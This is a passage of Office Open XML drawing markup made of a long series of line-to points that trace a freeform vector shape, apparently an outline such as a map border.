                  <a:pt x="5981" y="1601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5908" y="1662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5892" y="1591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5845" y="1611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5715" y="1620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5649" y="1601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5736" y="1540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5711" y="1489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5659" y="1489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5612" y="1466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5529" y="1425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5489" y="1386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5442" y="1373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5404" y="1405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5338" y="1425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5385" y="1344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5281" y="1415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5265" y="1312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5244" y="1303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5204" y="1354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5152" y="1386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5152" y="1335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5063" y="1364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4970" y="1415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4912" y="1405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4834" y="1437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4768" y="1489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4731" y="1476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4695" y="1415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4627" y="1396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4591" y="1373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4549" y="1344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478" y="1354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4452" y="1344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4379" y="1335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4311" y="1303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4259" y="1312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4208" y="1293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4229" y="1261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4161" y="1261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4125" y="1283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4130" y="1232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4083" y="1200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3970" y="1261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3939" y="1261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3819" y="1303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3767" y="1322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3680" y="1373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3628" y="1425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3534" y="1476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3456" y="1489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3390" y="1550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3420" y="1579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3430" y="1630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3420" y="1694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3446" y="1733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3430" y="1806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3331" y="1816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3378" y="1755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3343" y="1755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3202" y="1816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3105" y="1858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3114" y="1928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3098" y="1980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3150" y="2012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3223" y="1989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3244" y="2021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3275" y="1989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3338" y="1970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3369" y="1970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3306" y="2012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3317" y="2031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3291" y="2092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3228" y="2124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3202" y="2114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3131" y="2175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3110" y="2156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3063" y="2166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3006" y="2227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2923" y="2297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2860" y="2371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2865" y="2422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2825" y="2493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2839" y="2525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2846" y="2576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2923" y="2554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2928" y="2596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2891" y="2647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2850" y="2721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2881" y="2721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2959" y="2670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2938" y="2730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2980" y="2689"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2975" y="2750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3027" y="2708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3032" y="2730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3110" y="2689"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3042" y="2759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2980" y="2862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2917" y="2904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2891" y="2926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2782" y="3006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2731" y="3058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2658" y="3067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2570" y="3141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2497" y="3183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2410" y="3244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2405" y="3263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2514" y="3221"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2580" y="3183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2653" y="3141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2721" y="3099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2747" y="3109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2834" y="3058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2886" y="2997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2995" y="2936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3042" y="2875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3110" y="2843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3192" y="2782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3291" y="2698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3286" y="2637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3409" y="2544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3487" y="2464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3586" y="2390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3581" y="2422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3508" y="2464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3420" y="2586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3383" y="2657"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3456" y="2637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3519" y="2586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3591" y="2567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3623" y="2554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3659" y="2474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3727" y="2442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3757" y="2493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3819" y="2554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3892" y="2544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953" y="2586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3991" y="2605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4026" y="2740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4063" y="2782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4141" y="2782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4187" y="2791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4156" y="2904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4172" y="3006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4141" y="3119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4167" y="3160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4172" y="3212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4146" y="3273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4167" y="3375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4135" y="3478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4177" y="3529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4141" y="3613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4125" y="3725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4203" y="3786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4219" y="3837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4276" y="3972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4285" y="3972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4264" y="4075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4238" y="4187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4219" y="4219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4229" y="4094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4167" y="4056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4151" y="4075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4146" y="4136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4125" y="4248"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4078" y="4434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3995" y="4681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3934" y="4803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3923" y="4906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3892" y="5018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3850" y="5134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3861" y="5204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3845" y="5317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3861" y="5429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3871" y="5471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3866" y="5512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3871" y="5698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3897" y="5830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3887" y="5904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3897" y="5933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3948" y="5942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3960" y="5984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3991" y="5984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3991" y="6026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4012" y="6045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4038" y="6119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4031" y="6189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4038" y="6314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4042" y="6417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4052" y="6507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4057" y="6590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4089" y="6632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4120" y="6735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4109" y="6796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4078" y="6847"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4057" y="6837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4052" y="6847"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4073" y="6918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4104" y="6959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4115" y="6991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4125" y="6969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4161" y="7033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4182" y="7072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4182" y="7155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4172" y="7248"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4198" y="7290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4234" y="7351"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4264" y="7431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4276" y="7514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4285" y="7514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4311" y="7463"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4316" y="7444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4302" y="7380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4285" y="7319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4255" y="7309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4259" y="7239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250" y="7174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4238" y="7113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4234" y="6991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4208" y="6918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4198" y="6866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4187" y="6837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4187" y="6744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4177" y="6754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4177" y="6703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4167" y="6693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4161" y="6661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4130" y="6571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4120" y="6507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4130" y="6404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4130" y="6343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4151" y="6292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4177" y="6324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4198" y="6324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4234" y="6375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4224" y="6427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4229" y="6529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4245" y="6632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4238" y="6674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4259" y="6744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4280" y="6815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4311" y="6828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4316" y="6918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4342" y="6991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4368" y="7020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4349" y="7104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4353" y="7136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4400" y="7197"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4420" y="7277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472" y="7380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4509" y="7514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4523" y="7585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4523" y="7636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4540" y="7701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4535" y="7752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4519" y="7781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4523" y="7822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4504" y="7832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4509" y="7906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4535" y="7986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4591" y="8070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4612" y="8130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4669" y="8172"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4700" y="8182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4716" y="8214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4757" y="8284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4825" y="8345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4867" y="8368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4919" y="8429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4964" y="8448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5001" y="8490"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5032" y="8480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5084" y="8429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5119" y="8419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5166" y="8448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5192" y="8490"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5255" y="8644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5286" y="8695"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5312" y="8727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5348" y="8727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5379" y="8747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5395" y="8779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5426" y="8788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5451" y="8817"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5472" y="8830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5503" y="8830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5515" y="8798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5529" y="8807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5540" y="8849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5534" y="8859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5524" y="8840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5519" y="8859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5545" y="8920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5571" y="8961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5581" y="9013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5607" y="9064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5628" y="9106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5612" y="9138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5628" y="9157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5618" y="9199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5618" y="9241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5623" y="9270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5644" y="9279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5654" y="9321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5670" y="9279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5664" y="9250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5680" y="9270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5685" y="9311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5706" y="9330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5727" y="9353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5741" y="9382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5741" y="9414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5736" y="9446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5748" y="9465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5779" y="9497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5788" y="9517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5788" y="9484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5814" y="9484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5830" y="9507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5856" y="9517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5866" y="9568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5887" y="9578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5892" y="9558"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5903" y="9639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5929" y="9629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5939" y="9610"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5960" y="9587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5929" y="9517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5939" y="9484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5949" y="9484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5975" y="9456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5991" y="9404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6017" y="9395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6043" y="9433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6052" y="9475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6068" y="9484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6052" y="9526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6064" y="9600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6085" y="9639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6111" y="9712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6115" y="9825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6099" y="9857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6115" y="9979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6099" y="10062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6120" y="10091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6099" y="10165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6073" y="10255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6043" y="10267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6026" y="10306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6026" y="10380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6007" y="10389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6012" y="10431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5970" y="10482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5939" y="10511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5944" y="10575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5918" y="10656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5908" y="10739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5887" y="10758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5897" y="10883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5887" y="10922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5923" y="10986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5944" y="10922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5960" y="10986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5929" y="11089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5882" y="11169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5866" y="11262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5897" y="11397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5877" y="11458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5923" y="11509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5970" y="11602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5991" y="11705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6017" y="11766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6085" y="12032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6151" y="12279"/>
                </a:lnTo>
                <a:lnTo>
